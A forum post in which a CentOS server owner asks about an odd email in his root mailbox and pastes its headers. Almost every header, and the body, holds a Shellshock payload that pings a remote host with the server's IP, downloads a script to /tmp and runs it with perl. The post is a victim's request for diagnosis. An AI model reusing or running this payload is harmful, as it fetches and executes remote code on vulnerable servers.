Weired email log

1 post / 0 new
#1 Mon, 11/10/2014 - 00:39
drguild

Weired email log

Saw this in the 'Read User Mail' area on the root account not a virtual servers account, I check occasionally for things dunno if I should be looking into it more or if it's fine.

I presume whoever sent this was trying to run an exploit via php and postfix, I run Centos 6.6 all up to date so I don't know if it means anything being the root account that had this message.

I doubt its php as I don't use the cc etc fields on my site so how the message got in listed as root I dunno.

Update: appears from headers its probably just a auto emailer someone has searching out postfix servers or something.

Nothing is in the /tmp/ directory thats related to this.

Return-Path: <>
X-Original-To: nobody
Delivered-To: nobody@110-175-205-112.static.tpgi.com.au
Received: from flounder.oxid8.com (flounder.oxid8.com [67.18.114.194])
by 110-175-205-112.static.tpgi.com.au (Postfix) with SMTP id 77B8B20003D
for <nobody>; Sat,  8 Nov 2014 13:05:22 +0800 (AWST)
To:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
References:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Cc:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
From:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Subject:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Date:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Message-ID:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Comments:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Keywords:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-Date:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-From:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
Resent-Sender:() { :; };wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

wget http://yourschool.net/.tmp/frogclog.php?SMTP=110.175.205.112;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad